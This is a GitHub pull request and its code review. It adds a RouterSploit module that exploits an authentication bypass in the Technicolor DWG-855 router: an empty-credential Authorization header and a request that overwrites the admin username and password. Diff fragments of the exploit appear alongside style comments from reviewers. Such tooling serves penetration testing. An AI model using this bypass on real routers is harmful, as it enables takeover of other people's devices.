### PR TITLE
Create dwg855_authbypass.py

### PR DESCRIPTION
**Pull request by 0BuRner**
From https://github.com/JPaulMora/routersploit

### CODE REVIEW

**Comment by lucyoa** [comment]
Hi @0BuRner thanks for pull request. I have a question:

You check if target is vulnerable by searching magic string in logo.jpg file. Its ok for "check" method but I dont understand how you do it in "run" method. You request for different resource /goform/RgSecurity and also check if it contains this logo.jpg magic string in response. Is it correct?

I think you can simplify it by starting run method with:
```python
def run(self):
    if self.check():
        print_success("Target is vulnerable")
        (..) your code
    else:
        print_error("Target seems to be not vulnerable")
```

File: routersploit/modules/exploits/technicolor/dwg855_authbypass.py [hunk 1]
```diff
@@ -0,0 +1,82 @@
...
+                   'Accept-Encoding': 'gzip, deflate',
+                   'Authorization': 'Og==',  # this is base64(":")
+                   'Cache-Control': 'no-cache',
+                   'Connection': 'close'}
+
+        response = http_request(method="GET", url=url, headers=headers)
+
+        if response is None:
+            return False  # target is not vulnerable
+        elif self.vulnresp in response.text.encode('utf-8'):
```
Comment (fwkz) [inline routersploit/modules/exploits/technicolor/dwg855_authbypass.py]: So basically every other option other than `self.vulnresp in response.text.encode('utf-8')` will return `False` so you can just

```python
if self.vulnresp in response.text.encode('utf-8'):
    return True
else:
    return False
```

File: routersploit/modules/exploits/technicolor/dwg855_authbypass.py [hunk 2]
```diff
@@ -0,0 +1,82 @@
...
+    target = exploits.Option('192.168.0.1', 'Target address e.g. http://192.168.0.1', validators=validators.url)
+    port = exploits.Option(80, 'Target Port')
+    nuser = exploits.Option('ruser', 'Overwrite old user with.. ')
+    npass = exploits.Option('rpass', 'Overwrite old password with.. ')
+
+    # The check consists in trying to access router resources with incorrect creds. in this case logo.jpg Try it yourself!
+    vulnresp = binascii.unhexlify('114475636b7900')  # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg"
+
+    def run(self):
+        print_status("Changing " + self.target + " credentials to " + self.nuser + ":" + self.npass)
```
Comment (fwkz) [inline routersploit/modules/exploits/technicolor/dwg855_authbypass.py]: Concatenation is redundant you can just 
```python
print_status("Changing", self.target, "credentials to", self.nuser, ":", self.npass)
```

File: routersploit/modules/exploits/technicolor/dwg855_authbypass.py [hunk 3]
```diff
@@ -0,0 +1,82 @@
...
+        ],
+        'devices': [
+            'Technicolor DWG-855',
+        ]
+    }
+
+    target = exploits.Option('192.168.0.1', 'Target address e.g. http://192.168.0.1', validators=validators.url)
+    port = exploits.Option(80, 'Target Port')
+    nuser = exploits.Option('ruser', 'Overwrite old user with.. ')
+    npass = exploits.Option('rpass', 'Overwrite old password with.. ')
```
Comment (fwkz) [inline routersploit/modules/exploits/technicolor/dwg855_authbypass.py]: I think we should come up with more suitable description. Something like "New password (overwrite *existing* password)"

**Comment by 0BuRner** [comment]
Hi guys, thanks for you review. I'll take your comments into account and update the script later.
But I have to say I'm not the author of this script, like I said in my initial comment. I grab it from https://github.com/JPaulMora/routersploit and made some changes. So I couldn't assert this exploit is working.
I pushed it because I think it's too bad to see some people working on script like this one and not sharing on official repo. Maybe someone else could try and test it later.

File: routersploit/modules/exploits/technicolor/dwg855_authbypass.py (hunk 1 above)
Comment (0BuRner) [inline routersploit/modules/exploits/technicolor/dwg855_authbypass.py]: I'm new to python but if I'm not mistaken, a runtime error will be throw if request is None...

**Comment by fwkz** [comment]
@0BuRner really appreciate the effort of digging into someone else's repo and share this module. Great contribution.

**Pull request merged**